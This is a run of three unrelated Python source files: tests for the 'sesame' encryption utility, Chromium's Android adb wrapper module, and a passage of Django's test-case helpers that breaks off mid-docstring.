import collections import mock import os import shutil import tempfile import time import uuid from sesame.core import decrypt from sesame.core import encrypt from sesame.utils import create_key from sesame.utils import make_secure_temp_directory from utils import cd from utils import mkdir_p from utils import delete_path class TestSesame(object): def setup(self): """ Create a working directory and some test files """ self.working_dir = tempfile.mkdtemp() self.file_contents = collections.OrderedDict.fromkeys([ 'file.test', '1/file.test', '2/2/file.test', ]) self.file_timestamps = self.file_contents.copy() # create a key for the tests self.key = create_key(None, write=False) # setup files in subdirectory for path in self.file_contents.keys(): # create file content self.file_contents[path] = str(uuid.uuid4()) abspath = os.path.join(self.working_dir, path) # create subdirs as necessary mkdir_p(os.path.dirname(abspath)) # create test file in dir with open(abspath, 'w') as f: f.write(self.file_contents[path]) # record file creation time self.file_timestamps[path] = os.stat(abspath).st_ctime def teardown(self): """ Destroy working directory """ shutil.rmtree(self.working_dir) def testcreate_key(self): pass def test_single_relative(self): """ Simple auto-gen key; relative paths; deletes source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # delete the source file os.remove(test_file_path) # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # ensure file has been created assert os.path.exists(test_file_path) # verify decrypted contents with open(test_file_path, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_single_relative_force(self): """ Simple auto-gen key; relative paths; with force flag to overwrite source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse force=True, ) # ensure file has been overwritten assert self.file_timestamps[test_file_path] < os.stat(test_file_path).st_ctime # verify decrypted contents with open(test_file_path, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_single_relative_overwrite_true(self): """ Simple auto-gen key; relative paths; answer yes to overwrite the source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file; mock responds yes to overwrite the existing file with mock.patch('__builtin__.raw_input', return_value='y'): decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # ensure file has been overwritten assert self.file_timestamps[test_file_path] < os.stat(test_file_path).st_ctime # verify decrypted contents with open(test_file_path, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_single_relative_overwrite_false(self): """ Simple auto-gen key; relative paths; answer no to overwrite the source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file; mock responds no to overwrite the existing file with mock.patch('__builtin__.raw_input', return_value='n'): # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # ensure no file has been decrypted assert self.file_timestamps[test_file_path] == os.stat(test_file_path).st_ctime def test_single_relative_output_dir(self): """ Simple auto-gen key; relative paths; deletes source file; change output directory """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # create a new temporary directory to extract into with make_secure_temp_directory() as output_dir: # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=output_dir ) # ensure file has been created in the output_dir assert os.path.exists(os.path.join(output_dir, test_file_path)) # verify decrypted contents with open(os.path.join(output_dir, test_file_path), 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_single_absolute(self): """ Simple auto-gen key; absolute paths """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[os.path.join(self.working_dir, test_file_path)], outputfile=os.path.join(self.working_dir, 'sesame.encrypted'), keys=[self.key], ) # delete the source file os.remove(test_file_path) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file decrypt( inputfile=os.path.join(self.working_dir, 'sesame.encrypted'), keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # the file will be extracted on the absolute path test_file_path_abs = os.path.join(self.working_dir, test_file_path)[1:] # verify decrypted contents at the absolute extracted path with open(test_file_path_abs, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_multiple_relative(self): """ Test a directory hierarchy with relative paths """ with cd(self.working_dir): # encrypt all the test files encrypt( inputfiles=self.file_contents.keys(), outputfile='sesame.encrypted', keys=[self.key], ) # delete the source files for path in self.file_contents.keys(): delete_path(path) # decrypt the test files decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) for test_file_path in self.file_contents.keys(): # ensure files have been created assert os.path.exists(test_file_path) # verify decrypted contents with open(test_file_path, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_multiple_absolute(self): """ Test a directory hierarchy with absolute paths """ # convert the files list to absolute paths test_input_files = [ os.path.join(self.working_dir, path) for path in self.file_contents.keys() ] with cd(self.working_dir): # encrypt all the test files encrypt( inputfiles=test_input_files, outputfile='sesame.encrypted', keys=[self.key], ) # delete the source files for path in self.file_contents.keys(): delete_path(path) # decrypt the test files decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) for test_file_path in self.file_contents.keys(): # the file will be extracted on the absolute path test_file_path_abs = os.path.join(self.working_dir, test_file_path)[1:] # verify decrypted contents at the absolute extracted path with open(test_file_path_abs, 'r') as f: assert self.file_contents[test_file_path] == f.read()
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """This module wraps Android's adb tool. This is a thin wrapper around the adb interface. Any additional complexity should be delegated to a higher level (ex. DeviceUtils). """ import errno import os from pylib import cmd_helper from pylib.utils import reraiser_thread from pylib.utils import timeout_retry _DEFAULT_TIMEOUT = 30 _DEFAULT_RETRIES = 2 class BaseError(Exception): """Base exception for all device and command errors.""" pass class CommandFailedError(BaseError): """Exception for command failures.""" def __init__(self, cmd, msg, device=None): super(CommandFailedError, self).__init__( (('device %s: ' % device) if device else '') + 'adb command \'%s\' failed with message: \'%s\'' % (' '.join(cmd), msg)) class CommandTimeoutError(BaseError): """Exception for command timeouts.""" pass def _VerifyLocalFileExists(path): """Verifies a local file exists. Args: path: Path to the local file. Raises: IOError: If the file doesn't exist. """ if not os.path.exists(path): raise IOError(errno.ENOENT, os.strerror(errno.ENOENT), path) class AdbWrapper(object): """A wrapper around a local Android Debug Bridge executable.""" def __init__(self, device_serial): """Initializes the AdbWrapper. Args: device_serial: The device serial number as a string. """ self._device_serial = str(device_serial) @classmethod def _AdbCmd(cls, arg_list, timeout, retries, check_error=True): """Runs an adb command with a timeout and retries. Args: arg_list: A list of arguments to adb. timeout: Timeout in seconds. retries: Number of retries. check_error: Check that the command doesn't return an error message. This does NOT check the return code of shell commands. Returns: The output of the command. """ cmd = ['adb'] + arg_list # This method runs inside the timeout/retries. def RunCmd(): exit_code, output = cmd_helper.GetCmdStatusAndOutput(cmd) if exit_code != 0: raise CommandFailedError( cmd, 'returned non-zero exit code %s, output: %s' % (exit_code, output)) # This catches some errors, including when the device drops offline; # unfortunately adb is very inconsistent with error reporting so many # command failures present differently. if check_error and output[:len('error:')] == 'error:': raise CommandFailedError(arg_list, output) return output try: return timeout_retry.Run(RunCmd, timeout, retries) except reraiser_thread.TimeoutError as e: raise CommandTimeoutError(str(e)) def _DeviceAdbCmd(self, arg_list, timeout, retries, check_error=True): """Runs an adb command on the device associated with this object. Args: arg_list: A list of arguments to adb. timeout: Timeout in seconds. retries: Number of retries. check_error: Check that the command doesn't return an error message. This does NOT check the return code of shell commands. Returns: The output of the command. """ return self._AdbCmd( ['-s', self._device_serial] + arg_list, timeout, retries, check_error=check_error) def __eq__(self, other): """Consider instances equal if they refer to the same device. Args: other: The instance to compare equality with. Returns: True if the instances are considered equal, false otherwise. """ return self._device_serial == str(other) def __str__(self): """The string representation of an instance. Returns: The device serial number as a string. """ return self._device_serial def __repr__(self): return '%s(\'%s\')' % (self.__class__.__name__, self) # TODO(craigdh): Determine the filter criteria that should be supported. @classmethod def GetDevices(cls, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Get the list of active attached devices. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Yields: AdbWrapper instances. """ output = cls._AdbCmd(['devices'], timeout, retries) lines = [line.split() for line in output.split('\n')] return [AdbWrapper(line[0]) for line in lines if len(line) == 2 and line[1] == 'device'] def GetDeviceSerial(self): """Gets the device serial number associated with this object. Returns: Device serial number as a string. """ return self._device_serial def Push(self, local, remote, timeout=60*5, retries=_DEFAULT_RETRIES): """Pushes a file from the host to the device. Args: local: Path on the host filesystem. remote: Path on the device filesystem. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ _VerifyLocalFileExists(local) self._DeviceAdbCmd(['push', local, remote], timeout, retries) def Pull(self, remote, local, timeout=60*5, retries=_DEFAULT_RETRIES): """Pulls a file from the device to the host. Args: remote: Path on the device filesystem. local: Path on the host filesystem. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ self._DeviceAdbCmd(['pull', remote, local], timeout, retries) _VerifyLocalFileExists(local) def Shell(self, command, expect_rc=None, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Runs a shell command on the device. Args: command: The shell command to run. expect_rc: (optional) If set checks that the command's return code matches this value. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: The output of the shell command as a string. Raises: CommandFailedError: If the return code doesn't match |expect_rc|. """ if expect_rc is None: actual_command = command else: actual_command = '%s; echo $?;' % command output = self._DeviceAdbCmd( ['shell', actual_command], timeout, retries, check_error=False) if expect_rc is not None: output_end = output.rstrip().rfind('\n') + 1 rc = output[output_end:].strip() output = output[:output_end] if int(rc) != expect_rc: raise CommandFailedError( ['shell', command], 'shell command exited with code: %s' % rc, self._device_serial) return output def Logcat(self, filter_spec=None, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Get the logcat output. Args: filter_spec: (optional) Spec to filter the logcat. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: logcat output as a string. """ cmd = ['logcat'] if filter_spec is not None: cmd.append(filter_spec) return self._DeviceAdbCmd(cmd, timeout, retries, check_error=False) def Forward(self, local, remote, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Forward socket connections from the local socket to the remote socket. Sockets are specified by one of: tcp:<port> localabstract:<unix domain socket name> localreserved:<unix domain socket name> localfilesystem:<unix domain socket name> dev:<character device name> jdwp:<process pid> (remote only) Args: local: The host socket. remote: The device socket. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ self._DeviceAdbCmd(['forward', str(local), str(remote)], timeout, retries) def JDWP(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """List of PIDs of processes hosting a JDWP transport. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: A list of PIDs as strings. """ return [a.strip() for a in self._DeviceAdbCmd(['jdwp'], timeout, retries).split('\n')] def Install(self, apk_path, forward_lock=False, reinstall=False, sd_card=False, timeout=60*2, retries=_DEFAULT_RETRIES): """Install an apk on the device. Args: apk_path: Host path to the APK file. forward_lock: (optional) If set forward-locks the app. reinstall: (optional) If set reinstalls the app, keeping its data. sd_card: (optional) If set installs on the SD card. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ _VerifyLocalFileExists(apk_path) cmd = ['install'] if forward_lock: cmd.append('-l') if reinstall: cmd.append('-r') if sd_card: cmd.append('-s') cmd.append(apk_path) output = self._DeviceAdbCmd(cmd, timeout, retries) if 'Success' not in output: raise CommandFailedError(cmd, output) def Uninstall(self, package, keep_data=False, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Remove the app |package| from the device. Args: package: The package to uninstall. keep_data: (optional) If set keep the data and cache directories. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ cmd = ['uninstall'] if keep_data: cmd.append('-k') cmd.append(package) output = self._DeviceAdbCmd(cmd, timeout, retries) if 'Failure' in output: raise CommandFailedError(cmd, output) def Backup(self, path, packages=None, apk=False, shared=False, nosystem=True, include_all=False, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Write an archive of the device's data to |path|. Args: path: Local path to store the backup file. packages: List of to packages to be backed up. apk: (optional) If set include the .apk files in the archive. shared: (optional) If set buckup the device's SD card. nosystem: (optional) If set exclude system applications. include_all: (optional) If set back up all installed applications and |packages| is optional. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ cmd = ['backup', path] if apk: cmd.append('-apk') if shared: cmd.append('-shared') if nosystem: cmd.append('-nosystem') if include_all: cmd.append('-all') if packages: cmd.extend(packages) assert bool(packages) ^ bool(include_all), ( 'Provide \'packages\' or set \'include_all\' but not both.') ret = self._DeviceAdbCmd(cmd, timeout, retries) _VerifyLocalFileExists(path) return ret def Restore(self, path, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Restore device contents from the backup archive. Args: path: Host path to the backup archive. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ _VerifyLocalFileExists(path) self._DeviceAdbCmd(['restore'] + [path], timeout, retries) def WaitForDevice(self, timeout=60*5, retries=_DEFAULT_RETRIES): """Block until the device is online. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ self._DeviceAdbCmd(['wait-for-device'], timeout, retries) def GetState(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Get device state. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: One of 'offline', 'bootloader', or 'device'. """ return self._DeviceAdbCmd(['get-state'], timeout, retries).strip() def GetDevPath(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Gets the device path. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: The device path (e.g. usb:3-4) """ return self._DeviceAdbCmd(['get-devpath'], timeout, retries) def Remount(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Remounts the /system partition on the device read-write.""" self._DeviceAdbCmd(['remount'], timeout, retries) def Reboot(self, to_bootloader=False, timeout=60*5, retries=_DEFAULT_RETRIES): """Reboots the device. Args: to_bootloader: (optional) If set reboots to the bootloader. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ if to_bootloader: cmd = ['reboot-bootloader'] else: cmd = ['reboot'] self._DeviceAdbCmd(cmd, timeout, retries) def Root(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Restarts the adbd daemon with root permissions, if possible. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ output = self._DeviceAdbCmd(['root'], timeout, retries) if 'cannot' in output: raise CommandFailedError(['root'], output)
from __future__ import unicode_literals from copy import copy import difflib import errno from functools import wraps import json import os import re import sys try: from urllib.parse import urlsplit, urlunsplit except ImportError: # Python 2 from urlparse import urlsplit, urlunsplit import select import socket import threading import warnings from django.conf import settings from django.contrib.staticfiles.handlers import StaticFilesHandler from django.core import mail from django.core.exceptions import ValidationError, ImproperlyConfigured from django.core.handlers.wsgi import WSGIHandler from django.core.management import call_command from django.core.management.color import no_style from django.core.servers.basehttp import (WSGIRequestHandler, WSGIServer, WSGIServerException) from django.core.urlresolvers import clear_url_caches, set_urlconf from django.db import connection, connections, DEFAULT_DB_ALIAS, transaction from django.forms.fields import CharField from django.http import QueryDict from django.test import _doctest as doctest from django.test.client import Client from django.test.html import HTMLParseError, parse_html from django.test.signals import template_rendered from django.test.utils import (CaptureQueriesContext, ContextList, override_settings, compare_xml, strip_quotes) from django.utils import six, unittest as ut2 from django.utils.encoding import force_text from django.utils.unittest import skipIf # Imported here for backward compatibility from django.utils.unittest.util import safe_repr from django.views.static import serve __all__ = ('DocTestRunner', 'OutputChecker', 'TestCase', 'TransactionTestCase', 'SimpleTestCase', 'skipIfDBFeature', 'skipUnlessDBFeature') normalize_long_ints = lambda s: re.sub(r'(?<![\w])(\d+)L(?![\w])', '\\1', s) normalize_decimals = lambda s: re.sub(r"Decimal\('(\d+(\.\d*)?)'\)", lambda m: "Decimal(\"%s\")" % m.groups()[0], s) def to_list(value): """ Puts value into a list if it's not already one. Returns an empty list if value is None. """ if value is None: value = [] elif not isinstance(value, list): value = [value] return value real_commit = transaction.commit real_rollback = transaction.rollback real_enter_transaction_management = transaction.enter_transaction_management real_leave_transaction_management = transaction.leave_transaction_management real_abort = transaction.abort def nop(*args, **kwargs): return def disable_transaction_methods(): transaction.commit = nop transaction.rollback = nop transaction.enter_transaction_management = nop transaction.leave_transaction_management = nop transaction.abort = nop def restore_transaction_methods(): transaction.commit = real_commit transaction.rollback = real_rollback transaction.enter_transaction_management = real_enter_transaction_management transaction.leave_transaction_management = real_leave_transaction_management transaction.abort = real_abort def assert_and_parse_html(self, html, user_msg, msg): try: dom = parse_html(html) except HTMLParseError as e: standardMsg = '%s\n%s' % (msg, e.msg) self.fail(self._formatMessage(user_msg, standardMsg)) return dom class OutputChecker(doctest.OutputChecker): def check_output(self, want, got, optionflags): """ The entry method for doctest output checking. Defers to a sequence of child checkers """ checks = (self.check_output_default, self.check_output_numeric, self.check_output_xml, self.check_output_json) for check in checks: if check(want, got, optionflags): return True return False def check_output_default(self, want, got, optionflags): """ The default comparator provided by doctest - not perfect, but good for most purposes """ return doctest.OutputChecker.check_output(self, want, got, optionflags) def check_output_numeric(self, want, got, optionflags): """Doctest does an exact string comparison of output, which means that some numerically equivalent values aren't equal. This check normalizes * long integers (22L) so that they equal normal integers. (22) * Decimals so that they are comparable, regardless of the change made to __repr__ in Python 2.6. """ return doctest.OutputChecker.check_output(self, normalize_decimals(normalize_long_ints(want)), normalize_decimals(normalize_long_ints(got)), optionflags) def check_output_xml(self, want, got, optionsflags): try: return compare_xml(want, got) except Exception: return False def check_output_json(self, want, got, optionsflags): """ Tries to compare want and got as if they were JSON-encoded data """ want, got = strip_quotes(want, got) try: want_json = json.loads(want) got_json = json.loads(got) except Exception: return False return want_json == got_json class DocTestRunner(doctest.DocTestRunner): def __init__(self, *args, **kwargs): doctest.DocTestRunner.__init__(self, *args, **kwargs) self.optionflags = doctest.ELLIPSIS class _AssertNumQueriesContext(CaptureQueriesContext): def __init__(self, test_case, num, connection): self.test_case = test_case self.num = num super(_AssertNumQueriesContext, self).__init__(connection) def __exit__(self, exc_type, exc_value, traceback): super(_AssertNumQueriesContext, self).__exit__(exc_type, exc_value, traceback) if exc_type is not None: return executed = len(self) self.test_case.assertEqual( executed, self.num, "%d queries executed, %d expected" % ( executed, self.num ) ) class _AssertTemplateUsedContext(object): def __init__(self, test_case, template_name): self.test_case = test_case self.template_name = template_name self.rendered_templates = [] self.rendered_template_names = [] self.context = ContextList() def on_template_render(self, sender, signal, template, context, **kwargs): self.rendered_templates.append(template) self.rendered_template_names.append(template.name) self.context.append(copy(context)) def test(self): return self.template_name in self.rendered_template_names def message(self): return '%s was not rendered.' % self.template_name def __enter__(self): template_rendered.connect(self.on_template_render) return self def __exit__(self, exc_type, exc_value, traceback): template_rendered.disconnect(self.on_template_render) if exc_type is not None: return if not self.test(): message = self.message() if len(self.rendered_templates) == 0: message += ' No template was rendered.' else: message += ' Following templates were rendered: %s' % ( ', '.join(self.rendered_template_names)) self.test_case.fail(message) class _AssertTemplateNotUsedContext(_AssertTemplateUsedContext): def test(self): return self.template_name not in self.rendered_template_names def message(self): return '%s was rendered.' % self.template_name class SimpleTestCase(ut2.TestCase): _warn_txt = ("save_warnings_state/restore_warnings_state " "django.test.*TestCase methods are deprecated. Use Python's " "warnings.catch_warnings context manager instead.") def __call__(self, result=None): """ Wrapper around default __call__ method to perform common Django test set up. This means that user-defined Test Cases aren't required to include a call to super().setUp(). """ testMethod = getattr(self, self._testMethodName) skipped = (getattr(self.__class__, "__unittest_skip__", False) or getattr(testMethod, "__unittest_skip__", False)) if not skipped: try: self._pre_setup() except (KeyboardInterrupt, SystemExit): raise except Exception: result.addError(self, sys.exc_info()) return super(SimpleTestCase, self).__call__(result) if not skipped: try: self._post_teardown() except (KeyboardInterrupt, SystemExit): raise except Exception: result.addError(self, sys.exc_info()) return def _pre_setup(self): pass def _post_teardown(self): pass def save_warnings_state(self): """ Saves the state of the warnings module """ warnings.warn(self._warn_txt, DeprecationWarning, stacklevel=2) self._warnings_state = warnings.filters[:] def restore_warnings_state(self): """ Restores the state of the warnings module to the state saved by save_warnings_state() """ warnings.warn(self._warn_txt, DeprecationWarning, stacklevel=2) warnings.filters = self._warnings_state[:] def settings(self, **kwargs): """ A context manager that temporarily sets a setting and reverts back to the original value when exiting the context. """ return override_settings(**kwargs) def assertRaisesMessage(self, expected_exception, expected_message, callable_obj=None, *args, **kwargs): """ Asserts that the message in a raised exception matches the passed value. Args: expected_exception: Exception class expected to be raised. expected_message: expected error message string value. callable_obj: Function to be called. args: Extra args. kwargs: Extra kwargs. """ return six.assertRaisesRegex(self, expected_exception, re.escape(expected_message), callable_obj, *args, **kwargs) def assertFieldOutput(self, fieldclass, valid, invalid, field_args=None, field_kwargs=None, empty_value=''): """ Asserts that a form field behaves correctly with various inputs. Args: fieldclass: the class of the field to be tested. valid: a dictionary mapping valid inputs to their expected cleaned values. invalid: a dictionary mapping invalid inputs to one or more raised error messages. field_args: the args passed to instantiate the field field_kwargs: the kwargs passed to instantiate the field empty_value: the expected clean output for inputs in empty_values """ if field_args is None: field_args = [] if field_kwargs is None: field_kwargs = {} required = fieldclass(*field_args, **field_kwargs) optional = fieldclass(*field_args, **dict(field_kwargs, required=False)) # test valid inputs for input, output in valid.items(): self.assertEqual(required.clean(input), output) self.assertEqual(optional.clean(input), output) # test invalid inputs for input, errors in invalid.items(): with self.assertRaises(ValidationError) as context_manager: required.clean(input) self.assertEqual(context_manager.exception.messages, errors) with self.assertRaises(ValidationError) as context_manager: optional.clean(input) self.assertEqual(context_manager.exception.messages, errors) # test required inputs error_required = [force_text(required.error_messages['required'])] for e in required.empty_values: with self.assertRaises(ValidationError) as context_manager: required.clean(e) self.assertEqual(context_manager.exception.messages, error_required) self.assertEqual(optional.clean(e), empty_value) # test that max_length and min_length are always accepted if issubclass(fieldclass, CharField): field_kwargs.update({'min_length':2, 'max_length':20}) self.assertTrue(isinstance(fieldclass(*field_args, **field_kwargs), fieldclass)) def assertHTMLEqual(self, html1, html2, msg=None): """ Asserts that two HTML snippets are semantically the same. Whitespace in most cases is ignored, and attribute ordering is not significant. The passed-in arguments must be valid HTML. """ dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:') dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:') if dom1 != dom2: standardMsg = '%s != %s' % ( safe_repr(dom1, True), safe_repr(dom2, True)) diff = ('\n' + '\n'.join(difflib.ndiff( six.text_type(dom1).splitlines(), six.text_type(dom2).splitlines()))) standardMsg = self._truncateMessage(standardMsg, diff) self.fail(self._formatMessage(msg, standardMsg)) def assertHTMLNotEqual(self, html1, html2, msg=None): """Asserts that two HTML snippets are not semantically equivalent.""" dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:') dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:') if dom1 == dom2: standardMsg = '%s == %s' % ( safe_repr(dom1, True), safe_repr(dom2, True)) self.fail(self._formatMessage(msg, standardMsg)) def assertInHTML(self, needle, haystack, count = None, msg_prefix=''): needle = assert_and_parse_html(self, needle, None, 'First argument is not valid HTML:') haystack = assert_and_parse_html(self, haystack, None, 'Second argument is not valid HTML:') real_count = haystack.count(needle) if count is not None: self.assertEqual(real_count, count, msg_prefix + "Found %d instances of '%s' in response" " (expected %d)" % (real_count, needle, count)) else: self.assertTrue(real_count != 0, msg_prefix + "Couldn't find '%s' in response" % needle) def assertJSONEqual(self, raw, expected_data, msg=None): try: data = json.loads(raw) except ValueError: self.fail("First argument is not valid JSON: %r" % raw) if isinstance(expected_data, six.string_types): try: expected_data = json.loads(expected_data) except ValueError: self.fail("Second argument is not valid JSON: %r" % expected_data) self.assertEqual(data, expected_data, msg=msg) def assertXMLEqual(self, xml1, xml2, msg=None): """ Asserts that two XML snippets are semantically the same. Whitespace in most cases is ignored, and attribute ordering is not significant. The passed-in arguments must be valid XML. """ try: result = compare_xml(xml1, xml2) except Exception as e: standardMsg = 'First or second argument is not valid XML\n%s' % e self.fail(self._formatMessage(msg, standardMsg)) else: if not result: standardMsg = '%s != %s' % (safe_repr(xml1, True), safe_repr(xml2, True)) self.fail(self._formatMessage(msg, standardMsg)) def assertXMLNotEqual(self, xml1, xml2, msg=None): """ Asserts that two XML snippets are not semantically equivalent. Whitespace in most cases is ignored, and attribute ordering is not significant. The passed-in arguments must be valid XML. """ try: result = compare_xml(xml1, xml2) except Exception as e: standardMsg = 'First or second argument is not valid XML\n%s' % e self.fail(self._formatMessage(msg, standardMsg)) else: if result: standardMsg = '%s == %s' % (safe_repr(xml1, True), safe_repr(xml2, True)) self.fail(self._formatMessage(msg, standardMsg)) class TransactionTestCase(SimpleTestCase): # The class we'll use for the test client self.client. # Can be overridden in derived classes. client_class = Client # Subclasses can ask for resetting of auto increment sequence before each # test case reset_sequences = False def _pre_setup(self): """Performs any pre-test setup. This includes: * Flushing the database. * If the Test Case class has a 'fixtures' member, installing the named fixtures. * If the Test Case class has a 'urls' member, replace the ROOT_URLCONF with it. * Clearing the mail test outbox. """ self.client = self.client_class() self._fixture_setup() self._urlconf_setup() mail.outbox = [] def _databases_names(self, include_mirrors=True): # If the test case has a multi_db=True flag, act on all databases, # including mirrors or not. Otherwise, just on the default DB. if getattr(self, 'multi_db', False): return [alias for alias in connections if include_mirrors or not connections[alias].settings_dict['TEST_MIRROR']] else: return [DEFAULT_DB_ALIAS] def _reset_sequences(self, db_name): conn = connections[db_name] if conn.features.supports_sequence_reset: sql_list = \ conn.ops.sequence_reset_by_name_sql(no_style(), conn.introspection.sequence_list()) if sql_list: with transaction.commit_on_success_unless_managed(using=db_name): cursor = conn.cursor() for sql in sql_list: cursor.execute(sql) def _fixture_setup(self): for db_name in self._databases_names(include_mirrors=False): # Reset sequences if self.reset_sequences: self._reset_sequences(db_name) if hasattr(self, 'fixtures'): # We have to use this slightly awkward syntax due to the fact # that we're using *args and **kwargs together. call_command('loaddata', *self.fixtures, **{'verbosity': 0, 'database': db_name, 'skip_validation': True}) def _urlconf_setup(self): set_urlconf(None) if hasattr(self, 'urls'): self._old_root_urlconf = settings.ROOT_URLCONF settings.ROOT_URLCONF = self.urls clear_url_caches() def _post_teardown(self): """ Performs any post-test things. This includes: * Putting back the original ROOT_URLCONF if it was changed. * Force closing the connection, so that the next test gets a clean cursor. """ self._fixture_teardown() self._urlconf_teardown() # Some DB cursors include SQL statements as part of cursor # creation. If you have a test that does rollback, the effect # of these statements is lost, which can effect the operation # of tests (e.g., losing a timezone setting causing objects to # be created with the wrong time). # To make sure this doesn't happen, get a clean connection at the # start of every test. for conn in connections.all(): conn.close() def _fixture_teardown(self): for db in self._databases_names(include_mirrors=False): call_command('flush', verbosity=0, interactive=False, database=db, skip_validation=True, reset_sequences=False) def _urlconf_teardown(self): set_urlconf(None) if hasattr(self, '_old_root_urlconf'): settings.ROOT_URLCONF = self._old_root_urlconf clear_url_caches() def assertRedirects(self, response, expected_url, status_code=302, target_status_code=200, host=None, msg_prefix=''): """Asserts that a response redirected to a specific URL, and that the redirect URL can be loaded. Note that assertRedirects won't work for external links since it uses TestClient to do a request. """ if msg_prefix: msg_prefix += ": " if hasattr(response, 'redirect_chain'): # The request was a followed redirect self.assertTrue(len(response.redirect_chain) > 0, msg_prefix + "Response didn't redirect as expected: Response" " code was %d (expected %d)" % (response.status_code, status_code)) self.assertEqual(response.redirect_chain[0][1], status_code, msg_prefix + "Initial response didn't redirect as expected:" " Response code was %d (expected %d)" % (response.redirect_chain[0][1], status_code)) url, status_code = response.redirect_chain[-1] self.assertEqual(response.status_code, target_status_code, msg_prefix + "Response didn't redirect as expected: Final" " Response code was %d (expected %d)" % (response.status_code, target_status_code)) else: # Not a followed redirect self.assertEqual(response.status_code, status_code, msg_prefix + "Response didn't redirect as expected: Response" " code was %d (expected %d)" % (response.status_code, status_code)) url = response.url scheme, netloc, path, query, fragment = urlsplit(url) redirect_response = response.client.get(path, QueryDict(query)) # Get the redirection page, using the same client that was used # to obtain the original response. self.assertEqual(redirect_response.status_code, target_status_code, msg_prefix + "Couldn't retrieve redirection page '%s':" " response code was %d (expected %d)" % (path, redirect_response.status_code, target_status_code)) e_scheme, e_netloc, e_path, e_query, e_fragment = urlsplit( expected_url) if not (e_scheme or e_netloc): expected_url = urlunsplit(('http', host or 'testserver', e_path, e_query, e_fragment)) self.assertEqual(url, expected_url, msg_prefix + "Response redirected to '%s', expected '%s'" % (url, expected_url)) def assertContains(self, response, text, count=None, status_code=200, msg_prefix='', html=False): """ Asserts that a response indicates that some content was retrieved successfully, (i.e., the HTTP status code was as expected), and that ``text`` occurs ``count`` times in the content of the response. If ``count`` is None, the count doesn't matter - the assertion is true if the text occurs at least once in the response. """ # If the response supports deferred 